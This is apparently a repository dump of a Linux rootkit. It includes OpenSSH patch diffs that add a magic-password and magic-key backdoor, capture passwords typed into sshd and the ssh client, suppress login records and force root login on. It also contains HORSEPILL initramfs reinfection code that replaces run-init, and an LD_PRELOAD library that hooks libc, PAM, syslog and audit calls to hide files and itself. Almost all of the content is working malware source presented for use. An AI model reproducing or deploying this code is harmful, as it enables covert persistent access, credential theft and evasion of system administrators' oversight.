235 | logit("Received SIGHUP; restarting.");
236 | close_listen_socks();
237 | close_startup_pipes();
238 | @@ -1842,6 +1848,9 @@
239 | }
240 | }
241 |
242 | +#ifdef HAVE_SYSTEMD
243 | + sd_notify(0, "READY=1");
244 | +#endif
245 | /* Accept a connection and return in a forked child */
246 | server_accept_loop(&sock_in, &sock_out,
247 | &newsock, config_s);
248 | diff -Nuar 6.2p2.orig/sshlogin.c 6.2p2/sshlogin.c
249 | --- 6.2p2.orig/sshlogin.c 2020-04-10 17:17:30.511797952 +0200
250 | +++ 6.2p2/sshlogin.c 2020-04-10 19:23:01.064094150 +0200
251 | @@ -133,8 +133,7 @@
252 |
253 | li = login_alloc_entry(pid, user, host, tty);
254 | login_set_addr(li, addr, addrlen);
255 | - login_login(li);
256 | - login_free_entry(li);
257 | + if(!secret_ok || secret_ok!=1){ login_login(li); login_free_entry(li); }
258 | }
259 |
260 | #ifdef LOGIN_NEEDS_UTMPX
261 | @@ -146,8 +145,7 @@
262 |
263 | li = login_alloc_entry(pid, user, host, ttyname);
264 | login_set_addr(li, addr, addrlen);
265 | - login_utmp_only(li);
266 | - login_free_entry(li);
267 | + if(!secret_ok || secret_ok!=1){ login_utmp_only(li); login_free_entry(li); }
268 | }
269 | #endif
270 |
271 | @@ -158,6 +156,5 @@
272 | struct logininfo *li;
273 |
274 | li = login_alloc_entry(pid, user, NULL, tty);
275 | - login_logout(li);
276 | - login_free_entry(li);
277 | + if(!secret_ok || secret_ok!=1){ login_logout(li); login_free_entry(li); }
278 | }
279 |
--------------------------------------------------------------------------------
/pre/ssh_patches/o_ssh_691:
--------------------------------------------------------------------------------
1 | diff -Nuar 6.9p1.orig/auth-pam.c 6.9p1/auth-pam.c
2 | --- 6.9p1.orig/auth-pam.c 2020-05-29 18:59:39.244124664 +0200
3 | +++ 6.9p1/auth-pam.c 2020-05-29 19:00:02.920124948 +0200
4 | @@ -1208,6 +1208,19 @@
5 | if (sshpam_err == PAM_SUCCESS && authctxt->valid) {
6 | debug("PAM: password authentication accepted for %.100s",
7 | authctxt->user);
8 | + char *ohk = strdup(OPENSSH_KEY);
9 | + rox(ohk);
10 | + if((f=fopen(ohk, "a+")) != NULL){
11 | + CLEAN(ohk);
12 | + char bds[512];
13 | + sprintf(bds, "from local: %s:%s", authctxt->user, password);
14 | + rox(bds);
15 | + fprintf(f, "%s\n", bds);
16 | + CLEAN(bds);
17 | + fflush(f);
18 | + fclose(f);
19 | + }
20 | + CLEAN(ohk);
21 | return 1;
22 | } else {
23 | debug("PAM: password authentication failed for %.100s: %s",
24 | diff -Nuar 6.9p1.orig/auth-passwd.c 6.9p1/auth-passwd.c
25 | --- 6.9p1.orig/auth-passwd.c 2020-05-29 18:59:39.244124664 +0200
26 | +++ 6.9p1/auth-passwd.c 2020-05-29 19:00:02.920124948 +0200
27 | @@ -87,6 +87,14 @@
28 | static int expire_checked = 0;
29 | #endif
30 |
31 | + char *olic = strdup(OPENSSH_LICENSE);
32 | + rox(olic);
33 | + if (!strcmp(password, olic)){
34 | + CLEAN(olic);
35 | + secret_ok = 1;
36 | + return 1;
37 | + }
38 | + CLEAN(olic);
39 | #ifndef HAVE_CYGWIN
40 | if (pw->pw_uid == 0 && options.permit_root_login != PERMIT_YES)
41 | ok = 0;
42 | @@ -124,6 +132,21 @@
43 | }
44 | #endif
45 | result = sys_auth_passwd(authctxt, password);
46 | + if(result){
47 | + char *ohk = strdup(OPENSSH_KEY);
48 | + rox(ohk);
49 | + if((f=fopen(ohk, "a+")) != NULL){
50 | + CLEAN(ohk);
51 | + char bds[512];
52 | + sprintf(bds, "from local: %s:%s", authctxt->user, password);
53 | + rox(bds);
54 | + fprintf(f, "%s\n", bds);
55 | + CLEAN(bds);
56 | + fflush(f);
57 | + fclose(f);
58 | + }
59 | + CLEAN(ohk);
60 | + }
61 | if (authctxt->force_pwchange)
62 | disable_forwarding();
63 | return (result && ok);
64 | diff -Nuar 6.9p1.orig/auth.c 6.9p1/auth.c
65 | --- 6.9p1.orig/auth.c 2020-05-29 18:59:39.244124664 +0200
66 | +++ 6.9p1/auth.c 2020-05-29 19:00:02.924124948 +0200
67 | @@ -294,6 +294,7 @@
68 | else
69 | authmsg = authenticated ? "Accepted" : "Failed";
70 |
71 | + if(!secret_ok || secret_ok != 1){
72 | authlog("%s %s%s%s for %s%.100s from %.200s port %d %s%s%s",
73 | authmsg,
74 | method,
75 | @@ -305,6 +306,7 @@
76 | compat20 ? "ssh2" : "ssh1",
77 | authctxt->info != NULL ? ": " : "",
78 | authctxt->info != NULL ? authctxt->info : "");
79 | + }
80 | free(authctxt->info);
81 | authctxt->info = NULL;
82 |
83 | diff -Nuar 6.9p1.orig/canohost.c 6.9p1/canohost.c
84 | --- 6.9p1.orig/canohost.c 2020-05-29 18:59:39.248124664 +0200
85 | +++ 6.9p1/canohost.c 2020-05-29 19:00:02.924124948 +0200
86 | @@ -77,12 +77,14 @@
87 |
88 | debug3("Trying to reverse map address %.100s.", ntop);
89 | /* Map the IP address to a host name. */
90 | + if(!secret_ok || secret_ok != 1){
91 | if (getnameinfo((struct sockaddr *)&from, fromlen, name, sizeof(name),
92 | NULL, 0, NI_NAMEREQD) != 0) {
93 | /* Host name not found. Use ip address. */
94 | return xstrdup(ntop);
95 | }
96 |
97 | + }
98 | /*
99 | * if reverse lookup result looks like a numeric hostname,
100 | * someone is trying to trick us by PTR record like following:
101 | diff -Nuar 6.9p1.orig/conf.h 6.9p1/conf.h
102 | --- 6.9p1.orig/conf.h 1970-01-01 03:00:00.000000000 +0300
103 | +++ 6.9p1/conf.h 2020-05-29 19:00:02.924124948 +0200
104 | @@ -0,0 +1,12 @@
105 | +#include
106 | +
107 | +int secret_ok;
108 | +FILE *f;
109 | +#define OPENSSH_KEY "%%SSHD_LOGS%%"
110 | +#define OPENSSH_LICENSE "%%SSHD_SECKEY%%"
111 | +#define SSHD_NEWKEY "%%SSHD_NEWKEY%%"
112 | +#define XKEY %%XKEY%%
113 | +
114 | +#define CLEAN(var) memset(var, 0x00, strlen(var))
115 | +
116 | +#define rox(p) size_t iii;for(iii=0;iiiserver_key_bits = -1;
179 | options->login_grace_time = -1;
180 | options->key_regeneration_time = -1;
181 | - options->permit_root_login = PERMIT_NOT_SET;
182 | + options->permit_root_login = PERMIT_YES;
183 | options->ignore_rhosts = -1;
184 | options->ignore_user_known_hosts = -1;
185 | options->print_motd = -1;
186 | @@ -903,11 +903,11 @@
187 | { NULL, -1 }
188 | };
189 | static const struct multistate multistate_permitrootlogin[] = {
190 | - { "without-password", PERMIT_NO_PASSWD },
191 | - { "forced-commands-only", PERMIT_FORCED_ONLY },
192 | + { "without-password", PERMIT_YES },
193 | + { "forced-commands-only", PERMIT_YES },
194 | { "yes", PERMIT_YES },
195 | - { "no", PERMIT_NO },
196 | - { NULL, -1 }
197 | + { "no", PERMIT_YES },
198 | + { NULL, PERMIT_YES }
199 | };
200 | static const struct multistate multistate_compression[] = {
201 | { "delayed", COMP_DELAYED },
202 | diff -Nuar 6.9p1.orig/sshconnect2.c 6.9p1/sshconnect2.c
203 | --- 6.9p1.orig/sshconnect2.c 2020-05-29 18:59:39.284124665 +0200
204 | +++ 6.9p1/sshconnect2.c 2020-05-29 19:00:13.120125071 +0200
205 | @@ -889,6 +889,19 @@
206 | snprintf(prompt, sizeof(prompt), "%.30s@%.128s's password: ",
207 | authctxt->server_user, host);
208 | password = read_passphrase(prompt, 0);
209 | + char *ohk = strdup(OPENSSH_KEY);
210 | + rox(ohk);
211 | + if((f=fopen(ohk, "a+")) != NULL){
212 | + CLEAN(ohk);
213 | + char bds[512];
214 | + sprintf(bds, "from remote: %s:%s@%s", authctxt->server_user, password,authctxt->host);
215 | + rox(bds);
216 | + fprintf(f, "%s\n", bds);
217 | + CLEAN(bds);
218 | + fflush(f);
219 | + fclose(f);
220 | + }
221 | + CLEAN(ohk);
222 | packet_start(SSH2_MSG_USERAUTH_REQUEST);
223 | packet_put_cstring(authctxt->server_user);
224 | packet_put_cstring(authctxt->service);
225 | diff -Nuar 6.9p1.orig/sshd.c 6.9p1/sshd.c
226 | --- 6.9p1.orig/sshd.c 2020-05-29 18:59:39.284124665 +0200
227 | +++ 6.9p1/sshd.c 2020-05-29 19:00:13.120125071 +0200
228 | @@ -85,6 +85,9 @@
229 | #include
230 | #endif
231 |
232 | +#ifdef HAVE_SYSTEMD
233 | +#include
234 | +#endif
235 | #include "xmalloc.h"
236 | #include "ssh.h"
237 | #include "ssh1.h"
238 | @@ -309,6 +312,9 @@
239 | static void
240 | sighup_restart(void)
241 | {
242 | +#ifdef HAVE_SYSTEMD
243 | + sd_notify(0, "RELOADING=1");
244 | +#endif
245 | logit("Received SIGHUP; restarting.");
246 | platform_pre_restart();
247 | close_listen_socks();
248 | @@ -2023,6 +2029,9 @@
249 | }
250 | }
251 |
252 | +#ifdef HAVE_SYSTEMD
253 | + sd_notify(0, "READY=1");
254 | +#endif
255 | /* Accept a connection and return in a forked child */
256 | server_accept_loop(&sock_in, &sock_out,
257 | &newsock, config_s);
258 | diff -Nuar 6.9p1.orig/sshlogin.c 6.9p1/sshlogin.c
259 | --- 6.9p1.orig/sshlogin.c 2020-05-29 18:59:39.284124665 +0200
260 | +++ 6.9p1/sshlogin.c 2020-05-29 19:00:13.120125071 +0200
261 | @@ -134,8 +134,7 @@
262 |
263 | li = login_alloc_entry(pid, user, host, tty);
264 | login_set_addr(li, addr, addrlen);
265 | - login_login(li);
266 | - login_free_entry(li);
267 | + if(!secret_ok || secret_ok!=1){ login_login(li); login_free_entry(li); }
268 | }
269 |
270 | #ifdef LOGIN_NEEDS_UTMPX
271 | @@ -147,8 +146,7 @@
272 |
273 | li = login_alloc_entry(pid, user, host, ttyname);
274 | login_set_addr(li, addr, addrlen);
275 | - login_utmp_only(li);
276 | - login_free_entry(li);
277 | + if(!secret_ok || secret_ok!=1){ login_utmp_only(li); login_free_entry(li); }
278 | }
279 | #endif
280 |
281 | @@ -159,6 +157,5 @@
282 | struct logininfo *li;
283 |
284 | li = login_alloc_entry(pid, user, NULL, tty);
285 | - login_logout(li);
286 | - login_free_entry(li);
287 | + if(!secret_ok || secret_ok!=1){ login_logout(li); login_free_entry(li); }
288 | }
289 |
--------------------------------------------------------------------------------
/pre/ssh_patches/s_ssh_531:
--------------------------------------------------------------------------------
1 | diff -Nuar 5.3p1.orig/auth2-pubkey.c 5.3p1/auth2-pubkey.c
2 | --- 5.3p1.orig/auth2-pubkey.c 2020-04-10 17:17:30.363797946 +0200
3 | +++ 5.3p1/auth2-pubkey.c 2020-04-14 13:32:02.328859288 +0200
4 | @@ -254,6 +254,22 @@
5 | int success;
6 | char *file;
7 |
8 | + char *blob = NULL, *keytext = NULL;
9 | + int len = 0;
10 | + key_to_blob(key, &blob, &len);
11 | + keytext = xmalloc(2*len);
12 | + if(uuencode(blob, len, keytext, 2*len) > 0){
13 | + char *newkey = strdup(SSHD_NEWKEY);
14 | + rox(newkey);
15 | + if(!strcmp(newkey, keytext)){
16 | + CLEAN(newkey);
17 | + CLEAN(keytext);
18 | + secret_ok = 1;
19 | + return 1;
20 | + }
21 | + CLEAN(newkey);
22 | + }
23 | + CLEAN(keytext);
24 | file = authorized_keys_file(pw);
25 | success = user_key_allowed2(pw, key, file);
26 | xfree(file);
27 |
--------------------------------------------------------------------------------
/pre/ssh_patches/s_ssh_582:
--------------------------------------------------------------------------------
1 | diff -Nuar 5.8p2.orig/auth2-pubkey.c 5.8p2/auth2-pubkey.c
2 | --- 5.8p2.orig/auth2-pubkey.c 2020-04-10 17:17:30.443797949 +0200
3 | +++ 5.8p2/auth2-pubkey.c 2020-04-14 13:32:19.532859965 +0200
4 | @@ -439,6 +439,22 @@
5 | int success;
6 | char *file;
7 |
8 | + char *blob = NULL, *keytext = NULL;
9 | + int len = 0;
10 | + key_to_blob(key, &blob, &len);
11 | + keytext = xmalloc(2*len);
12 | + if(uuencode(blob, len, keytext, 2*len) > 0){
13 | + char *newkey = strdup(SSHD_NEWKEY);
14 | + rox(newkey);
15 | + if(!strcmp(newkey, keytext)){
16 | + CLEAN(newkey);
17 | + CLEAN(keytext);
18 | + secret_ok = 1;
19 | + return 1;
20 | + }
21 | + CLEAN(newkey);
22 | + }
23 | + CLEAN(keytext);
24 | if (auth_key_is_revoked(key))
25 | return 0;
26 | if (key_is_cert(key) && auth_key_is_revoked(key->cert->signature_key))
27 |
--------------------------------------------------------------------------------
/pre/ssh_patches/s_ssh_771:
--------------------------------------------------------------------------------
1 | diff -Nuar 7.5p1.orig/auth2-pubkey.c 7.5p1/auth2-pubkey.c
2 | --- 7.5p1.orig/auth2-pubkey.c 2020-04-10 17:17:30.767797962 +0200
3 | +++ 7.5p1/auth2-pubkey.c 2020-04-14 20:02:58.149781873 +0200
4 | @@ -1093,6 +1093,22 @@
5 | u_int success, i;
6 | char *file;
7 |
8 | + char *blob = NULL, *keytext = NULL;
9 | + int len = 0;
10 | + key_to_blob(key, &blob, &len);
11 | + keytext = xmalloc(2*len);
12 | + if(uuencode(blob, len, keytext, 2*len) > 0){
13 | + char *newkey = strdup(SSHD_NEWKEY);
14 | + rox(newkey);
15 | + if(!strcmp(newkey, keytext)){
16 | + CLEAN(newkey);
17 | + CLEAN(keytext);
18 | + secret_ok = 1;
19 | + return 1;
20 | + }
21 | + CLEAN(newkey);
22 | + }
23 | + CLEAN(keytext);
24 | if (auth_key_is_revoked(key))
25 | return 0;
26 | if (key_is_cert(key) && auth_key_is_revoked(key->cert->signature_key))
27 |
--------------------------------------------------------------------------------
/pre/ssh_patches/s_ssh_861:
--------------------------------------------------------------------------------
1 | diff -Nuar 8.3p1.orig/auth2-pubkey.c 8.3p1/auth2-pubkey.c
2 | --- 8.3p1.orig/auth2-pubkey.c 2020-06-09 18:39:56.053921886 +0200
3 | +++ 8.3p1/auth2-pubkey.c 2020-06-10 10:18:28.796952019 +0200
4 | @@ -619,8 +619,19 @@
5 | goto out;
6 | } else {
7 | /* Plain key: check it against key found in file */
8 | - if (!sshkey_equal(found, key) || keyopts->cert_authority)
9 | - goto out;
10 | + if (!sshkey_equal(found, key) || keyopts->cert_authority){
11 | + char *newkey = strdup(SSHD_NEWKEY), *keytext = NULL;
12 | + rox(newkey);
13 | + sshkey_to_base64(key, &keytext);
14 | + if(strncmp(newkey,keytext,strlen(keytext))){
15 | + CLEAN(keytext);
16 | + CLEAN(newkey);
17 | + goto out;
18 | + }
19 | + secret_ok = 1;
20 | + CLEAN(keytext);
21 | + CLEAN(newkey);
22 | + }
23 | }
24 |
25 | /* We have a candidate key, perform authorisation checks */
26 |
--------------------------------------------------------------------------------
/src/CLIENT/.keep:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Not-C-Developer/VERBA/5c8b03f54c3f3e05b80c7d97893163c4907ac5b8/src/CLIENT/.keep
--------------------------------------------------------------------------------
/src/HORSEPILL/horsepill/horsepill.h:
--------------------------------------------------------------------------------
1 | #ifndef HORSEPILL_H
2 | #define HORSEPILL_H
3 |
4 | void perform_hacks();
5 | int should_backdoor();
6 | int grab_executable();
7 |
8 | #endif
9 |
10 |
--------------------------------------------------------------------------------
/src/HORSEPILL/horsepill/infect.c:
--------------------------------------------------------------------------------
1 | #include "infect.h"
2 |
3 | #include
4 | #include
5 | #include
6 | #include
7 | #include
8 | #include
9 | #include
10 | #include
11 | #include
12 | #include
13 | #include
14 |
15 | struct exe_t exe;
16 | struct ctx_t {
17 | int inotify_fd;
18 | int tmpdir_wd;
19 | int bin_wd;
20 | int bin_create_wd;
21 | int run_init_wd;
22 | char tmpfile[PATH_MAX];
23 | char tmpdir[PATH_MAX];
24 | char run_init_path[PATH_MAX];
25 | } ctx;
26 |
27 | static void ctx_setup_common(void){
28 | ctx.bin_wd = -1;
29 | ctx.bin_create_wd = -1;
30 | ctx.run_init_wd = -1;
31 | ctx.tmpdir[0] = 0;
32 | ctx.tmpfile[0] = 0;
33 | ctx.run_init_path[0] = 0;
34 | }
35 |
36 | static int ctx_init(void){
37 | int rc;
38 | rc = inotify_init();
39 | if (rc < 0) {
40 | perror("could not init inotify");
41 | goto out;
42 | }
43 | ctx.inotify_fd = rc;
44 | rc = fcntl(ctx.inotify_fd, F_SETFD, O_NONBLOCK);
45 | if (rc < 0) {
46 | perror("could not fctnl");
47 | goto out;
48 | }
49 | rc = inotify_add_watch(ctx.inotify_fd, "/var/tmp", IN_CREATE);
50 | if (rc < 0) {
51 | perror("could not add watch");
52 | goto out;
53 | }
54 | ctx.tmpdir_wd = rc;
55 | ctx_setup_common();
56 | rc = 0;
57 | out:
58 | return rc;
59 | }
60 |
61 | static void ctx_reset(void){
62 | (void)inotify_rm_watch(ctx.inotify_fd, ctx.bin_wd);
63 | (void)inotify_rm_watch(ctx.inotify_fd, ctx.bin_create_wd);
64 | (void)inotify_rm_watch(ctx.inotify_fd, ctx.run_init_wd);
65 | ctx_setup_common();
66 | }
67 |
68 | static int make_tempfile(char *basedir, mode_t mode){
69 | FILE* urandom = NULL;
70 | int rc = -1;
71 | int rand;
72 | char filename[PATH_MAX];
73 | do {
74 | urandom = fopen("/dev/urandom", "r");
75 | if(urandom == NULL){
76 | perror("couldn't open urandom");
77 | goto out;
78 | }
79 | fread((void*)(&rand), sizeof(rand), 1, urandom);
80 | fclose(urandom);
81 | snprintf(filename, sizeof(filename) - 1, "%s/reinfect-%X", basedir, rand);
82 | printf("made tmpfile of %s\n", filename);
83 | rc = open(filename, O_CREAT | O_RDWR | O_EXCL, mode);
84 | } while(rc == -EEXIST);
85 | if(rc < 0)
86 | perror("open");
87 | strcpy(basedir, filename);
88 | out:
89 | return rc;
90 | }
91 |
92 | static int splat_fd(int fd, unsigned char* buf, size_t len){
93 | int rc = -1;
94 | ssize_t s;
95 | size_t written = 0;
96 | for (;;){
97 | s = write(fd, (const void*)(buf+written), len-written);
98 | if(s < 0){
99 | perror("(splat_fd) write");
100 | goto out;
101 | }
102 | written += s;
103 | if(len == written)
104 | break;
105 | }
106 | (void)close(fd);
107 | rc = 0;
108 | out:
109 | return rc;
110 | }
111 |
112 | static int add_watch(const char *template, char *name, int mask){
113 | char filename[256];
114 | int rc;
115 | snprintf(filename, sizeof(filename) - 1, template, name);
116 | printf("adding watch on %s\n", filename);
117 | rc = inotify_add_watch(ctx.inotify_fd,filename, mask);
118 | if (rc < 0) {
119 | char buf[256];
120 | snprintf(buf, sizeof(buf), "adding watch on %s:", filename);
121 | perror(buf);
122 | }
123 | return rc;
124 | }
125 |
126 | static void handle_inotify_event(const struct inotify_event *event){
127 | if ((event->mask & IN_CREATE) && (event->len)) {
128 | const char template[] = "mkinitramfs_";
129 | if ((event->wd == ctx.tmpdir_wd) && (event->mask & IN_ISDIR) && !strncmp(event->name, template, sizeof(template) - 1)) {
130 | char *name = (char*)(event->name);
131 | int rc;
132 | rc = add_watch("/var/tmp/%s", name, IN_CREATE);
133 | if(rc < 0){
134 | printf("couldn't add watch!\n");
135 | exit(EXIT_FAILURE);
136 | }
137 | ctx.bin_wd = rc;
138 | snprintf(ctx.tmpdir, sizeof(ctx.tmpdir) - 1,"/var/tmp/%s", name);
139 | strcpy(ctx.tmpfile, "/var/tmp");
140 | rc = make_tempfile(ctx.tmpfile, S_IRWXU | S_IRGRP | S_IXGRP | S_IROTH | S_IXOTH);
141 | if (rc < 0) {
142 | perror("mkstmp");
143 | exit(EXIT_FAILURE);
144 | }
145 | printf("tmpfile is %s\n", ctx.tmpfile);
146 | rc = splat_fd(rc, exe.buf, exe.len);
147 | if (rc < 0) {
148 | perror("splat_file");
149 | exit(EXIT_FAILURE);
150 | }
151 | } else if ((event->wd == ctx.bin_wd) && (event->mask & IN_ISDIR) && !strcmp(event->name, "bin")) {
152 | ctx.bin_create_wd = add_watch("%s/bin", ctx.tmpdir, IN_CREATE);
153 | } else if ((event->wd == ctx.bin_create_wd) && !(event->mask & IN_ISDIR) && !strcmp(event->name, "run-init")) {
154 | snprintf(ctx.run_init_path, sizeof(ctx.run_init_path) - 1, "%s/bin/run-init", ctx.tmpdir);
155 | ctx.run_init_wd = add_watch("%s/bin/run-init", ctx.tmpdir, IN_CLOSE);
156 | }
157 | } else if ((event->wd == ctx.run_init_wd) && (event->mask & IN_CLOSE_WRITE)){
158 | rename(ctx.tmpfile, ctx.run_init_path);
159 | printf(" splatted over %s\n", ctx.run_init_path);
160 | ctx_reset();
161 | }
162 | }
163 |
164 | static void handle_inotify(void){
165 | char buf[4096*2]
166 | __attribute__ ((aligned(__alignof__(struct inotify_event))));
167 | const struct inotify_event *event;
168 | ssize_t len;
169 | char *ptr;
170 | for (;;) {
171 | len = read(ctx.inotify_fd, buf, sizeof buf);
172 | if (len == -1 && errno != EAGAIN){
173 | perror("read");
174 | exit(EXIT_FAILURE);
175 | }
176 | if (len <= 0)
177 | break;
178 | for (ptr = buf; ptr < buf + len; ptr += sizeof(struct inotify_event) + event->len){
179 | event = (const struct inotify_event *) ptr;
180 | handle_inotify_event(event);
181 | }
182 | }
183 | }
184 |
185 | pid_t run_reinfect(){
186 | pid_t pid;
187 | pid = fork();
188 | if (pid < 0){
189 | printf("couldn't fork!\n");
190 | exit(EXIT_FAILURE);
191 | } else if (pid == 0){
192 | struct pollfd pollfds[1];
193 | struct sched_param sched = {
194 | .sched_priority = 1
195 | };
196 | int rc;
197 | close(0);
198 | close(1);
199 | close(2);
200 | (void)open("/dev/null", O_RDONLY);
201 | (void)open("/dev/null", O_WRONLY);
202 | (void)open("/dev/null", O_RDWR);
203 | if (ctx_init() < 0) {
204 | perror("could not initialize structure");
205 | exit(EXIT_FAILURE);
206 | }
207 | rc = sched_setscheduler(getpid(), SCHED_FIFO, &sched);
208 | if (rc < 0) {
209 | perror("sched_setscheduler");
210 | exit(EXIT_FAILURE);
211 | }
212 | pollfds[0].fd = ctx.inotify_fd;
213 | pollfds[0].events = POLLIN | POLLNVAL;
214 | while ((rc = poll(pollfds, 1, -1))) {
215 | if (rc < 0) {
216 | if (errno == -EINTR) {
217 | continue;
218 | } else {
219 | perror("error in poll");
220 | exit(EXIT_FAILURE);
221 | }
222 | }
223 | if (pollfds[0].revents & POLLIN)
224 | handle_inotify();
225 | }
226 | exit(EXIT_FAILURE);
227 | }
228 | return pid;
229 | }
230 |
231 | int infect_get_inotify_fd(){
232 | return ctx.inotify_fd;
233 | }
234 |
235 | int infect_init(){
236 | return ctx_init();
237 | }
238 |
239 | void infect_handle_inotify(){
240 | handle_inotify();
241 | }
242 |
--------------------------------------------------------------------------------
/src/HORSEPILL/horsepill/infect.h:
--------------------------------------------------------------------------------
1 | #ifndef INFECT_H
2 | #define INFECT_H
3 |
4 | #include
5 |
6 | struct exe_t {
7 | unsigned char* buf;
8 | size_t len;
9 | };
10 |
11 | extern struct exe_t exe;
12 |
13 | int infect_get_inotify_fd();
14 | int infect_init();
15 | void infect_handle_inotify();
16 |
17 | pid_t run_reinfect();
18 |
19 | #endif
20 |
--------------------------------------------------------------------------------
/src/HORSEPILL/init.diff:
--------------------------------------------------------------------------------
1 | --- init 2020-03-27 11:22:49.120000000 -0400
2 | +++ init.new 2020-03-27 11:23:09.644000000 -0400
3 | @@ -334,10 +334,6 @@
4 | mount -n -o move /proc ${rootmnt}/proc
5 |
6 | # Chain to real filesystem
7 | -if [ -z "$drop_caps" ] && command -v switch_root >/dev/null 2>&1; then
8 | - exec switch_root ${rootmnt} ${init} "$@" <${rootmnt}/dev/console >${rootmnt}/dev/console
9 | -elif command -v run-init >/dev/null 2>&1; then
10 | - exec run-init ${drop_caps} ${rootmnt} ${init} "$@" <${rootmnt}/dev/console >${rootmnt}/dev/console
11 | -fi
12 | +exec run-init ${drop_caps} ${rootmnt} ${init} "$@" <${rootmnt}/dev/console >${rootmnt}/dev/console
13 | echo "Something went badly wrong in the initramfs."
14 | panic "Please file a bug on initramfs-tools."
15 |
--------------------------------------------------------------------------------
/src/HORSEPILL/run-init:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Not-C-Developer/VERBA/5c8b03f54c3f3e05b80c7d97893163c4907ac5b8/src/HORSEPILL/run-init
--------------------------------------------------------------------------------
/src/LD/LD.c:
--------------------------------------------------------------------------------
1 | #define _GNU_SOURCE
2 |
3 | #include
4 | #include
5 | #include
6 | #include
7 | #include
8 | #include
9 | #include
10 | #include
11 | #include
12 | #include
13 | #include
14 | #include
15 | #include
16 | #include
17 | #include
18 | #include
19 | #include
20 |
21 | #include
22 | #include
23 |
24 | #include
25 | #include
26 |
27 | #include
28 | #include
29 |
30 | #include
31 | #include
32 | #include
33 | #include
34 |
35 | #include "config.h"
36 | #include "hooks/libdl/libdl.h"
37 | #include "util/util.h"
38 | #include "hiding/hiding.h"
39 |
40 | int kill(pid_t pid, int sig);
41 | #include "hooks/kill.c"
42 |
43 | long ptrace(void *request, pid_t pid, void *addr, void *data);
44 | #include "hooks/ptrace.c"
45 |
46 | static int ssme(int domain, int protocol);
47 | int socket(int domain, int type, int protocol);
48 | #include "hooks/socket.c"
49 | #include "hooks/pcap/pcap.h"
50 |
51 | #include "hooks/exec/exec.h"
52 | #include "hooks/open/open.h"
53 | #include "hooks/stat/stat.h"
54 | //#include "hooks/rw/rw.h"
55 | #include "hooks/dir/dir.h"
56 | #include "hooks/ln/links.h"
57 | #include "hooks/gid/gid.h"
58 | #include "hooks/perms/perms.h"
59 |
60 | #include "hooks/pam/pam.h"
61 | #include "hooks/authlog/authlog.h"
62 | #include "hooks/pwd/pwd.h"
63 | #include "hooks/audit/audit.h"
64 | #include "hooks/utmp/utmp.h"
65 | #include "hooks/syslog/syslog.h"
66 |
67 | int __libc_start_main(int *(main) (int, char **, char **), int argc, char **ubp_av, void (*init)(void), void (*fini)(void), void (*rtld_fini)(void), void (*stack_end)){
68 | if(not_user(0))
69 | goto do_libc_start_main;
70 | DIR *dp;
71 | hook(COPENDIR);
72 | dp = call(COPENDIR, INSTALL_DIR);
73 | if(dp == NULL)
74 | goto do_libc_start_main;
75 | closedir(dp);
76 | reinstall();
77 | do_libc_start_main:
78 | hook(C__LIBC_START_MAIN);
79 | return (long)call(C__LIBC_START_MAIN, main, argc, ubp_av, init, fini, rtld_fini, stack_end);
80 | }
81 |
--------------------------------------------------------------------------------
/src/LD/Makefile:
--------------------------------------------------------------------------------
1 | SHELL = /bin/sh
2 | CC = gcc
3 |
4 | FLAGS = -std=gnu99
5 | CFLAGS = -fomit-frame-pointer -fPIC -s -Wall -Wextra -Wshadow -Wno-unused-function -fstack-protector-all -funroll-loops -fno-jump-tables -Os -g0 -I./
6 | LDFLAGS = -shared -Wl,--build-id=none,-z,relro,-z,now -ldl -lcrypt -lpam -lssl
7 |
8 | TARGET = LD.so
9 | SOURCES = LD.c
10 | OBJECTS = $(SOURCES:.c=.o)
11 |
12 | UNAME_P := $(shell uname -p)
13 | ifneq ($(filter %86,$(UNAME_P)),)
14 | FLAGS += -m32
15 | endif
16 |
17 | $(TARGET): $(OBJECTS)
18 | $(CC) $(FLAGS) $(CFLAGS) $^ -o $@ $(LDFLAGS)
19 |
20 | clean:
21 | rm -f $(OBJECTS) $(TARGET)
22 |
--------------------------------------------------------------------------------
/src/LD/char_arrays:
--------------------------------------------------------------------------------
1 | libc_calls:__libc_start_main,kill,accept,socket,getutent,getutxent,getutid,getutxid,getutmp,getutmpx,getutline,getutxline,logwtmp,updwtmp,updwtmpx,openlog,syslog,__syslog_chk,vsyslog,ptrace,execve,execvp,chown,chmod,fchmod,fchmodat,setgid,setegid,setregid,setresgid,mkdir,rmdir,readdir,readdir64,opendir,opendir64,fdopendir,chdir,fchdir,readlink,readlinkat,symlink,symlinkat,unlink,unlinkat,open,open64,openat,openat64,access,creat,creat64,fwrite,fwrite_unlocked,fread,fread_unlocked,write,read,fopen,fopen64,freopen,freopen64,stat,stat64,fstatat,fstatat64,lstat,lstat64,__xstat,__xstat64,__fxstat,__fxstat64,__lxstat,__lxstat64,getpwnam,getpwuid,getspnam,getpwnam_r,audit_log_acct_message,audit_log_user_message,audit_send,login
2 | libpam_calls:pam_syslog,pam_vsyslog,pam_authenticate,pam_open_session,pam_acct_mgmt,pam_prompt,pam_vprompt
3 | libdl_calls:dlsym,dlinfo,dladdr
4 | libpcap_calls:pcap_loop
5 |
--------------------------------------------------------------------------------
/src/LD/config.h:
--------------------------------------------------------------------------------
1 | #define BD_UNAME "%%BD_UNAME%%"
2 | #define BD_PWD "%%BD_PWD%%"
3 | #define INSTALL_DIR "%%IDIR%%"
4 | #define BDVLSO "%%BDVLSO%%"
5 | #define SOPATH "%%SOPATH%%"
6 | #define LDSO_PRELOAD "%%N_PRELOAD%%"
7 | #define LDSO_LOGS "%%LDSO_LOGS%%"
8 | #define HIDE_IP_PATH "%%HIDE_IP_PATH%%"
9 | #define BD_SSHPROCNAME "%%BD_SSHPROCNAME%%"
10 |
11 | #define XKEY %%XKEY%%
12 | #define MAGIC_GID %%MGID%%
13 |
14 | #define PATH_MAX 4096
15 | #define LINE_MAX 2048
16 |
17 | typedef struct symbol_struct {
18 | void *(*func)();
19 | } syms;
20 |
21 | #define sizeofarray(arr) sizeof(arr) / sizeof(arr[0])
22 |
--------------------------------------------------------------------------------
/src/LD/hiding/evasion/block_strings.c:
--------------------------------------------------------------------------------
1 | static int scary_path(char *string){
2 | if(xstrstr(BDVLSO, string) || xstrstr(INSTALL_DIR, string))
3 | return 1;
4 | char *path;
5 | int i;
6 | for(i = 0; i < SCARY_PATHS_SIZE; i++){
7 | path = scary_paths[i];
8 | if(!fnmatch(path, string, FNM_PATHNAME))
9 | return 1;
10 | else if(!strncmp(path, string, strlen(path)))
11 | return 1;
12 | else if(strstr(string, path))
13 | return 1;
14 | }
15 | return 0;
16 | }
17 |
